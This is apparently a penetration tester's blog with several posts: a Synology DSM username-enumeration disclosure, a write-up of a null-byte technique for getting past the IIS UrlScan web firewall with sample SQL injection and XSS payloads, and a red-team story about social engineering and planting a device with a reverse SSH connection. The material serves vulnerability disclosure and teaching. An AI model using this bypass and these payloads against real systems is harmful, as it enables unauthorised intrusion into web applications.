Monday, January 8, 2018

Dear Diary - Its barely 2018 and skeletons are a plenty...

Excited to see how this Spectre and Meltdown patch madness will pan out, $10 says an engineer somewhere finger flubs something, then the debugger doesn't catch it and pushes to production distribution.

Meanwhile, still waiting on meaningful exploit code beyond telling me that I'm either vulnerable or not.

In other news, will be trying to post more here. Life is hard, but add in blog stuff on top of that, work and family and you probably have a better idea of my life than I do myself.

Expect more content, I have tons written up for consuming, but need to sort through all the garbage that is my internal monologue dictating narration in them.

That and the non-stop quest to not rehash or regurgitate others works. Once its been done, there is no other point to doing it.

Discovery and the unknown are my two favorite friends, meanwhile chaos and curiosity continue to be my low key friends. We'll explore all the closets I've encountered (minus NDA ones), and hopefully provide something of value to the next person.

Unless you call yourself someone's "right hand person", you can stop right there...

Friday, January 5, 2018

CVE-2017-9554 - Synology DSM User Enumeration - Unspecified Vector... Yea Right...

Previously this was identified by the developer and the disclosure states "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi

Haven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another.


Per the CVE:

"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors."

Well then... Here you go, cracked the code and figured it out.


Where XXX should be your injection point for username lists.

Several usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from it's passwd file or not, but there you go.


This is now published within ExploitDB

Wednesday, September 20, 2017

Identified My First Microsoft Product Exploit! IIS UrlScan WAF Bypass

#Paper Title: Microsoft IIS UrlScan Module Bypass Exploit
#Date: 16 AUG 2017
#Software Link:
#Author: Steven Kaun (Gh0st)
#Category: WAF Bypass

Identified after coming up with null for help with bypassing a WAF identified as UrlScan. After identifying that a web application was filtering and essentially dropping most attacks and their associated payloads a delve into how to bypass this was constructed. This is as simple as bypasses can possibly get, but at the same time is unique enough to warrant writing about.


We all understand that WAFs are in place to identify and block malicious requests before the reach the application, so in effect I need to figure out exactly what makes it tick or how to make it tick for us. To that regard the development of this came after exhaustive research into UrlScan and trying to see if anyone had run across this in the professional or unethical realm. Well, guess you can figure out how well that went.

Anyways... I've identified the IIS module "UrlScan 3.1" running on a IIS6 machine (Note this can be IIS 7.5, 6, 5, etc.), I've identified that the application is filtering certain characters, but I'm stuck because whatever malicious requests I send get dropped or filtered by UrlScan anyways.


So after perusing developer forums, Microsoft technical documentation, and various SQLmap documentation and tamper methods I had learned that appending (Null-Byte) can be performed by the tamper script "appendnullbyte". This however refused to work, and the UrlScan module picked it up right away. So what was I supposed to do? Well apparently UrlScan doesn't know how to handle or what to do when the prefix is the nullbyte, and as far as I'm aware there are no SQLmap tamper scripts that would perform this bypass.

So after formatting the sqlmap command with the real value of a parameter I know that this page exists and has dynamic content depending on the "users" integer value

Original Unmodified

I quickly learn that the appendnullbyte tamper script only modifys the payload like this (note this is just generic payload)' WAITFOR DELAY '0:0:10'--

So after analyzing the responses from the application it seemed like it wouldn't take it at all... However, not all is lost and after performing more research into the matter the solution became apparent after some random dev was complaining about UrlScan filter rule of basically crashing their application. So what I can extrapolate from that is that is a null value (obvious), but more so than that I can deduce that is not only not interpreted by UrlScan, but its completely overlooked because of the null value where it expects something.

Imagine if you will, you are an application looking for a value of anything greater than 0, but then you encounter 0. Would you simply stop interpreting it because to you there is nothing there? Well if you said yes, your in the same boat as UrlScan's logic apparently.

The Attack

NOTE Blogger removes Null Bytes that are URL encoded so it should look like this Percent Zero Zero.

So I've come to the conclusion that UrlScan expects some value to interpret or inspect whether it be in the Url, Url parameter, or POST body. I've also come to understand that if the value is null UrlScan simply ignores it on the basis that there is nothing to inspect, thus giving us the path towards carnage.

So here I am, at the end of the road... Will it work or not?' WAITFOR DELAY '0:0:10'--

IT WORKS! This little null value gave me the ability to perform SQL injection where SQL had failed time and time before.

This also allowed XSS to any arbitrary parameter I wanted...'><script>alert("XSS")</script>

REMEMBER NULL should be PERCENT ZERO ZERO after the valid data, but before the actual payload.


In the end I've learned the following...

1. UrlScan's logic is flawed in the manner of interpreting null values - Expects 1, but gets 0 and does not continue inspection
2. allows us to bypass UrlScan's logic to perform XSS and SQL injection where it would normally fail
3. filtering within UrlScan breaks applications for whatever reason
4. SQLmap does not have a tamper script with which to bypass UrlScan, only has the ability to append to end of payload where instead requires it be prepended to the payload

Monday, August 28, 2017

Perimeter Security Sensors - Why "AND" sensor logic is bad...

Don't mind me, just a placeholder for now. Will get more in-depth with a brief blog post on a security sensor I've encountered and how we beat it.

Thursday, August 17, 2017

Red Team Diaries #1 (Part 1 of 2) - Brief Synopsis? Or Obscure Dronings...

Good Morning!

So today I'll be writing about an obscure way I managed to get Domain Admin from a pretty strange attack chain.

It was back in the winter of 2016, and here in Minnesota that was probably the coldest winter I've experienced in a while (to the tune of -40 degree F windchill). So there I was, working with our local news crew and fellow RedTeam members on trying to pick a client's exterior doors... Hands completely numb, shivering so hard I felt like I might as well have been dancing... Eventually we were defeated, but never the less we persisted our efforts on attacking their networks and business at their request, and to showcase our talents to the local media.

We had been foiled in the physical attacks, however what was left was social engineering the employee's in person... Believe it or not, SE can quite literally give you access to almost anything if you present a valid enough claim that you are with XYZ internet service provider completing a work order to perform maintenance due to connectivity issues.

To that extent after gaining the trust of the employees all it took was a few minutes in their server room and installing a Raspberry Pi with linux and a few tools from Kali with a reverse ssh connection that would phone home. Suddenly it was no longer an issue to try to phish the employees through the phone, or through email attachments... We were in...

Soon after deploying the device I got to work. Started Nmap scripts, ran Responder and started taking a look at Nmap's output as Responder slowly gathered hashed NTLM credentials via SMB or NBNS spoofing and responding. Well turns out we didn't need those credentials after all!

Stay tuned for Part 2! The next section will go over how a single printer gave us "Key's to the Kingdom" for lack of better terminology beyond getting Domain Admin.

Wednesday, August 16, 2017

Figure it was that time...

In other words... stay tuned for some awesome blog posts regarding my experiences and what not in the world of hacking.

Personally I'm not entirely sure how much I'll blog, but hell the main reason I made this was to show the world new things and release exploit development ideas and research I've done while I've been at RedTeam Security and on my own time.

Moreover, I'll be showing some of the novel solutions to attacking things that not even my google-fu could find answers to. In that case you can expect some rather novel solutions to attacking obscure services and applications :D